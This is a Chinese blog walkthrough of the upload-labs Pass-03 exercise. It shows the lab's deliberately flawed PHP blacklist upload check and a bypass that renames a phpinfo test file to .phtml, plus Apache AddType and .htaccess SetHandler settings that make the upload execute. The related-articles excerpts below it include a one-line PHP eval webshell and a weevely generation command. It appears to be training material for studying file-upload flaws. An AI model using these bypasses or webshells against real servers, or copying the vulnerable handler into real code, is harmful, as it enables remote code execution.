upload-labs pass-03

最新推荐文章于 2024-08-22 14:32:03 发布
最新推荐文章于 2024-08-22 14:32:03 发布
阅读量88 收藏
点赞数
分类专栏: upload-labs 文章标签: 安全 php windows apache firefox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339082/article/details/118107367
版权

upload-labs pass-03

Pass-03

先看一下源码(黑名单绕过-特殊后缀):

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

strrchr()查找字符串在另一个字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符。

1.上传402.php。

<?php
phpinfo();
?>

提示,文件类型不正确,如下图所示:
在这里插入图片描述
2、修改文件后缀为:402.phtml。
在这里插入图片描述
3.上传成功,成功后,右击图片,查看我们的上传点,上传点为:http://127.0.0.1/upload/upload/202106220623415649.phtml
注意:
如果我们上传成功了,但是却不能解析,要正常解析还需要满足以下条件任意一种:
(1)Apache的 httpd.conf 中有如下配置代码:(其中包含你上传的文件后缀)

AddType application/x-httpd-php .php .phtml .phps .php5 .pht

在这里插入图片描述
在这里插入图片描述
(2)上传 .htaccess 伪静态文件,内容如下:
用伪静态需要保证:①mod_rewrite模块开启;②目录设置是AllowOverride All;

<FilesMatch "phpinfo.php5">
  SetHandler application/x-httpd-php
</FilesMatch>

在这里插入图片描述

weixin_50339082
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Upload-Labs-Pass-03
龙狼刺的博客
04-09 1143
一、环境搭配 攻击机: kali IP: 192.168.0.112 靶机: Windows2008 IP: 192.168.0.130:9006 二、文件上传 1、制作一句话木马 命令:<?php @eval($_POST['hacker']); ?> 2、设置代理 设置浏览器代理 设置BurpSuite代理 3、文件上传 设置完Payload后,点击Start attcck。 复制UR...
Upload-Labs-Pass-07
龙狼刺的博客
04-21 1294
一、相关知识 1、空格绕过原理: Windows系统下,文件后缀名最后一个点会被自动去除掉。 二、环境搭配 攻击机: kali IP: 192.168.0.112 靶机: Windows2008 IP: 192.168.0.130:9006 三、文件上传 1、创建webshell 格式:weevely generate 密码 文件的保存路径 文件名 命令:weevely generate cmd /home/kali/网络安全/木马/weevely.
Upload-labs文件上传漏洞(黑名单判断)—— Pass03
Zichel77的博客
07-27 852
0×00 题目描述 0×01 解题过程 看提示觉得并没有什么用,于是想要尝试按照老办法上传,看问题究竟出在哪里 首先直接上传php文件,看报错信息使用的是什么方式返回的 意味着可以抓包返回 于是尝试pass02中的修改Content-Type的方法 结果依旧上传不成功 查看一下题目的源代码 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(U..
Upload-lab练习源码分析pass1-3
Weaglew的博客
07-09 403
多方式wp:https://blog.csdn.net/qq_29647709/article/details/81227084 看源码时经常忘记某个函数的作用,此文做整理之用。 Pass1 使用JS在前端验证 1.上传符合条件的文件,之后抓包修改文件后缀 2.使用chromeconsole删掉check函数或将php后缀添加到代码中 3.firefox Noscript插件绕过 ...
upload-labs】————4、Pass-03
Fly_鹏程万里
08-15 497
Pass-03闯关界面 首先判断是前端检测还是服务器端检测,安装套路上传一个shell.php文件,同时使用burpsuite代理,看是否通过burpsuite代理,以及最后返回的提示信息: 经过burpsuite————后端检测 返回的检测信息: 从上面简易的测试,我们可以了解到本关属于服务器端检测,而且采用了黑名单的检测方法,那么我们只需要将上传的文件名改为不在黑名单且能够...
upload-labs第三关 pass-03 黑名单绕过
weixin_44522540的博客
02-26 3665
四、pass-03 黑名单绕过 提示:本pass禁止上传.asp|.aspx|.php|.jsp后缀文件! 源码: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array('.asp','.aspx','.php','.jsp'); $file_name = trim($_FILES['uploa
upload-labs19-20以及总结1
08-08
Pass19中,开发者试图通过限制上传文件的扩展名来防止这种攻击,但是他们只检查了保存文件名(`save_name`)是否包含黑名单中的扩展名,而未检查实际上传文件的类型。 以下是该关卡的主要知识点: 1. **文件名...
upload-labs-0.1.zip
12-21
1)推荐使用Windows系统搭建(注:使用docker pull c0ny1/upload-labs的镜像在Pass-03会遇到问题,初步判断是该镜像内的php.conf文件配置错误导致)。 2)下载地址 ...
upload-labs解析.pdf
10-19
Pass-03关卡中,我们可以看到黑名单的实现方式,并且可以通过修改httpd.conf文件来绕过黑名单的限制。 Upload-Labs为我们提供了一个测试Web应用程序安全性的平台,我们可以通过 Upload-Labs来测试和改进Web应用...
upload-labs靶场通关指南
07-02
Pass-1 中,我们发现了文件上传漏洞的基础知识。我们创建了一个 PHP 文件,命名为 1234.php,用 bp 抓包工具来抓取上传的文件。发现 BP 并没有抓取到包,并且网页弹出弹窗。这表明了上传文件的格式是有限制的。...
文件上传之upload-labs(一)
01-08
例如,在pass-02的示例中,检查`$_FILES['upload_file']['type']`来确认上传文件是否为合法的图片类型。此外,还应检查文件扩展名,避免通过更改文件名欺骗服务器。使用`move_uploaded_file()`函数将临时文件移动到...
upload-labs靶场-Pass-03关-思路以及过程
weixin_44257023的博客
01-14 2459
开始前的小准备 upload-labs靶场 是PHP环境运行的,所以我准备了一个PHP脚本和一张图片 图片好准备,PHP脚本如果不想写的话可以用我的这个获取当前时间的PHP脚本 <?php header("content-type:text/html;charset=utf-8"); date_default_timezone_set("PRC");//设置时区 echo "当前时间为:"; $today = date("Y-m-d D h:i:s A "); echo $today; ?
Upload-labs Pass-03 黑名单限制 解析漏洞
baynk的博客
11-03 1984
Pass-03 黑名单限制 0x01 过程 直接上传php文件。 有黑名单提示了,这里反应了一段时间,同时还是去检查了下JS,确实是后端的黑名单限制。我这里传了一个jpg上去。 发现可以上传成功的,查看下图片的链接src="../upload/201911031519209854.jpg",发现进行了重命名,只以最后的后缀名为真正的后缀名,这里就只能去尝试看有没有任意后缀名上传,php,php...
CTFweb篇——upload-labs(Pass02-Pass03)
suiyideAli的博客
09-24 775
CTFweb篇——upload-labs(Pass02-Pass03) 0X00 前言 Pass02与03在文件上传的题目中算是简单的基础题,涉及的操作不是很多。 0X01 Pass02 查看题目: 这里可以看到提示是:服务器端对数据包的MIME进行检查,借用找到的很久之前的一个帖子详解 MIME类型-服务端验证上传文件的类型 开始进行上传 上传122.php 使用Burp Suite进行抓包 ...
Upload-labs通关攻略
热门推荐
三舍的博客
06-03 1万+
Upload-labs通关攻略 Pass-01 JS绕过 开启代理抓包,发现没有产生流量就进行验证了,说明是前端JS验证 直接firebug修改前端代码,添加允许上传类型.php 直接上传Webshell,比如1.php,菜刀连接,网站根目录下发现flag.txt Pass-02 文件类型绕过 进行上传尝试,发现提示:文件类型不正确,请重新上传! 应该是文件类型Content-Type检测,BP抓包截断上传数据包,修改Content-Type为image/jpeg,然后放行数据包,成功绕过 Pas
关于 upload-labs-01 实验Pass-03使用phtml 替代 php 执行站点管理失败的应对办法
m0_47505062的博客
03-02 349
march the 02nd 2022 Wednesday
数采网关面临的安全挑战
编程之道在明明德在亲民在止于至善
08-22 351
数采网关面临的安全挑战
AI安全-文生图
深度安全实验室
08-15 504
AI安全-文生图
第134天:内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
最新发布
weixin_71529930的博客
08-22 435
本节案例适用于不能获得域控密码和hash的情况。
upload-labs pass6
07-28
- *1* [upload-labs靶场-Pass-06关-思路以及过程](https://blog.csdn.net/weixin_44257023/article/details/122506927)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值